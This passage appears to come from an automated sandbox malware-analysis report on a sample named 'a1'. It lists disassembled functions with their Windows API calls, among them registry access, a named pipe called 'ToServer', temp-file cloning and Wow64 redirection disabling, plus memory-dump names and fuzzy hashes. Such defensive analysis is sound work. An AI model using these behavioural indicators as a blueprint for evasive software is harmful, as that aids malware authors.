                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 002A234C
                                                                                                                                                                                                                                                                          • RegCreateKeyExW.KERNEL32(?,001CBB59,00000000,00000000,00000000,?,00000000,00000000,?,DF534560,?,?,?,00000000,?,Function_001C1810), ref: 002A2399
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressCreateHandleModuleProc
                                                                                                                                                                                                                                                                          • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                                                                                                                                                                                                                          • API String ID: 1964897782-2994018265
                                                                                                                                                                                                                                                                          • Opcode ID: 6f64a0014327a50077d7db01826d3e11f7d5b17aecedadcb3ea5cdd944f5f001
                                                                                                                                                                                                                                                                          • Instruction ID: 83aa2a057f10323c6f86d20c5815cff3715192864203aa5c9c1e2a85600294d5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f64a0014327a50077d7db01826d3e11f7d5b17aecedadcb3ea5cdd944f5f001
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9931C232644209FBEF25CF49CC45FAAB7A8FB16750F10816AF905D72C0DB75A814CB94
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Advapi32.dll,DF534560,?,?,?,?,?,Function_001C1810,000000FF,?,002B3D2C,?,?,000000FF), ref: 00281BF3
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00281C1C
                                                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(?,DF534560,00000000,?,00000000,DF534560,?,?,?,?,?,Function_001C1810,000000FF,?,002B3D2C,?), ref: 00281C55
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressHandleModuleOpenProc
                                                                                                                                                                                                                                                                          • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                                                                                                                                                                          • API String ID: 1337834000-3913318428
                                                                                                                                                                                                                                                                          • Opcode ID: 7399398e129bc968e918539a8a2b57de804ea80e6373bb1e256223b5fa7ed42d
                                                                                                                                                                                                                                                                          • Instruction ID: 32de70cbb6ce54cbbc7f4dbd5c02ba305d7a8989c60ee09e7d49f15ddce735db
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7399398e129bc968e918539a8a2b57de804ea80e6373bb1e256223b5fa7ed42d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4021D176A44216EFDB158F59DC45BAABBBCFB48750F00812AF815D72C0D771E820CB55
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(ComCtl32.dll,DF534560,00000000,?,00000000), ref: 002B94CE
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 002B94F1
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 002B956F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                          • String ID: ComCtl32.dll$LoadIconMetric
                                                                                                                                                                                                                                                                          • API String ID: 145871493-764666640
                                                                                                                                                                                                                                                                          • Opcode ID: d6b8a22eac0b7bcb8ad822d7838e958c8b84b6e29d93c4bdd3941c8b7726694e
                                                                                                                                                                                                                                                                          • Instruction ID: 25fd008fcbfb19011da5445009975a2a6969e62268ef5ae0a517566eedcc5a1a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6b8a22eac0b7bcb8ad822d7838e958c8b84b6e29d93c4bdd3941c8b7726694e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E316171A10269ABDF128FA5CC44BAFBFF8EB48750F000229F915A3281D7759A408B90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3136044242-0
                                                                                                                                                                                                                                                                          • Opcode ID: c69fed4e4c7807af4b03460659a008fed72a9e5365f45869f20be82b2521d7cf
                                                                                                                                                                                                                                                                          • Instruction ID: cb11ca9fd73f7aba014fd5e104191b565c623d15fc6b57df87e8e13f464b3d1d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c69fed4e4c7807af4b03460659a008fed72a9e5365f45869f20be82b2521d7cf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D21B673D00965ABCB22DE14CC44FAE3AF9EBC0B94F265925F8156B225DF318D418BD1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 6A547E10: GetProcessHeap.KERNEL32 ref: 6A547E6C
                                                                                                                                                                                                                                                                          • PathIsUNCW.SHLWAPI(?,?), ref: 6A565556
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 6A565572
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: HeapPathProcess_wcschr
                                                                                                                                                                                                                                                                          • String ID: \\?\$\\?\UNC\
                                                                                                                                                                                                                                                                          • API String ID: 1853780674-3019864461
                                                                                                                                                                                                                                                                          • Opcode ID: 4602e6471e06ec25dce00ff0454fee84466e3aa4ec9ded6b943e35ecaf535521
                                                                                                                                                                                                                                                                          • Instruction ID: 04555a45d5279722d7e2637188e5ed861791b6e2197cb67b1f6aef7498153989
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4602e6471e06ec25dce00ff0454fee84466e3aa4ec9ded6b943e35ecaf535521
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42C18F719006099BDB01CBA8C848B9EFBF9FF45314F158669E515EB2A2EF349D04CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ConnectNamedPipe.KERNEL32(?,00000000,DF534560,?,000000FF,?,?,00000000,003BABD6,000000FF,?,002F0F2A,000000FF,?,00000001), ref: 002F0D4C
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000,003BABD6,000000FF,?,002F0F2A,000000FF,?,00000001), ref: 002F0D56
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00007F90,00000000,00000000,DF534560,?,000000FF,?,?,00000000,003BABD6,000000FF,?,002F0F2A,000000FF), ref: 002F0DA3
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer$ConnectErrorFileHeapLastNamedPipeProcessRead
                                                                                                                                                                                                                                                                          • String ID: \\.\pipe\ToServer
                                                                                                                                                                                                                                                                          • API String ID: 2973225359-63420281
                                                                                                                                                                                                                                                                          • Opcode ID: e34886c67d8d694c98bad20f100d1ea145360764c74c4d8abc5e99a9206bb225
                                                                                                                                                                                                                                                                          • Instruction ID: a7411ed257bbf72cec0339cdcb4f64f7a58f456bb8775acce0301a54a541d26b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e34886c67d8d694c98bad20f100d1ea145360764c74c4d8abc5e99a9206bb225
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1471E071A04209AFDB10CF68C854BAEF7A8FF45324F10866DFA15DB382DB75A910CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 002EF224
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 002EF2A2
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000,00000000,00000000), ref: 002EF2EC
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EnvironmentVariable$ErrorLast
                                                                                                                                                                                                                                                                          • String ID: UserDomain
                                                                                                                                                                                                                                                                          • API String ID: 1936246020-2275544873
                                                                                                                                                                                                                                                                          • Opcode ID: 239ae32c61587038533112bc1d3ef888f89682598df0d2b8bd76ab37859b32e6
                                                                                                                                                                                                                                                                          • Instruction ID: 177845ec7a969ee667e2728a4dd80095dc4cfc0efbc6806366a5caf06322ced1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 239ae32c61587038533112bc1d3ef888f89682598df0d2b8bd76ab37859b32e6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F613571A10249DFDB14DFA9C955BEEBBF4FF58304F50012DE401A7280DBB5AA09CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00303084,40000000,00000001,00000000,00000002,00000080,00000000,DF534560,00000001,?), ref: 00302392
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,0000C800,0000C800,0000C800,00000000,?,0000C800), ref: 00302428
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,0000C800), ref: 0030245F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                                          • String ID: t=
                                                                                                                                                                                                                                                                          • API String ID: 1065093856-4144653439
                                                                                                                                                                                                                                                                          • Opcode ID: 63b0317566616b80af3f286ea9f851036fe8a0759f39a22c923a680d4832c5b2
                                                                                                                                                                                                                                                                          • Instruction ID: 5ab7f93dda32e44fca930554a9b5e6d1ceab3eed2057bb93bc3a95f5e94328e9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63b0317566616b80af3f286ea9f851036fe8a0759f39a22c923a680d4832c5b2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC412371910218ABDF11DF99DD48BDEBBB8FB48704F20416AE500B7290D775AA04CBA4
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,AA831995,00000034), ref: 6A54594C
                                                                                                                                                                                                                                                                          • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 6A54596E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FolderInformationPathVolume
                                                                                                                                                                                                                                                                          • String ID: %08X$AABBCCDD
                                                                                                                                                                                                                                                                          • API String ID: 1564939276-726327320
                                                                                                                                                                                                                                                                          • Opcode ID: e62bfa0c78c6a2099a97f77045cec5ae41ee45d5517fffdead0d494284320925
                                                                                                                                                                                                                                                                          • Instruction ID: 6d1382bd635d79869187717bcf8bd9861dd46cdc297473e06135c140052b4091
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e62bfa0c78c6a2099a97f77045cec5ae41ee45d5517fffdead0d494284320925
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0311EB5500749AFDB20CF64DC05BEE7BF8FB04704F004A1EE9569B680EBB56648CB95
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 002B6502
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer$HeapProcess_wcschr
                                                                                                                                                                                                                                                                          • String ID: \\?\$\\?\UNC\
                                                                                                                                                                                                                                                                          • API String ID: 978982089-3019864461
                                                                                                                                                                                                                                                                          • Opcode ID: 4ba27c66985af34806c70de0641c83867e65e4736b276928bf718bc79a91a5dd
                                                                                                                                                                                                                                                                          • Instruction ID: 28f8ab18a54ffcb1403127214c2eaf5e420f18c86813a85d53db545348788a46
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ba27c66985af34806c70de0641c83867e65e4736b276928bf718bc79a91a5dd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31C1BF71A1060A9BDB00DFA8CC49BEEF7B9FF54310F148269E515E72D1EB789914CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,003E6FD4,00000001,?), ref: 002B67DA
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,003BB955,000000FF,?,002F56E9), ref: 002B67E8
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                                          • String ID: V/
                                                                                                                                                                                                                                                                          • API String ID: 1375471231-3051789135
                                                                                                                                                                                                                                                                          • Opcode ID: a6ed3f788e7b593ddb909667a9c9b228a34b50cca0f73debc13e1ac8ae875bfa
                                                                                                                                                                                                                                                                          • Instruction ID: 3de531cdd6dcf4816b73097917f04db3108164cad2b593ee19a02ed6f1b70c17
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6ed3f788e7b593ddb909667a9c9b228a34b50cca0f73debc13e1ac8ae875bfa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25619C71E102099BDB10DFA8C889BDDBBB5EF15360F148269E815A72D1DB38A909CB50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 002BF280: GetTempPathW.KERNEL32(00000104,?), ref: 002BF369
                                                                                                                                                                                                                                                                            • Part of subcall function 002BF280: GetTempFileNameW.KERNEL32(?,shim_clone,00000000,?), ref: 002BF39A
                                                                                                                                                                                                                                                                            • Part of subcall function 002BF280: Wow64DisableWow64FsRedirection.KERNEL32(00000000,?), ref: 002BF3CD
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 002BF6CE
                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 002BF6E1
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
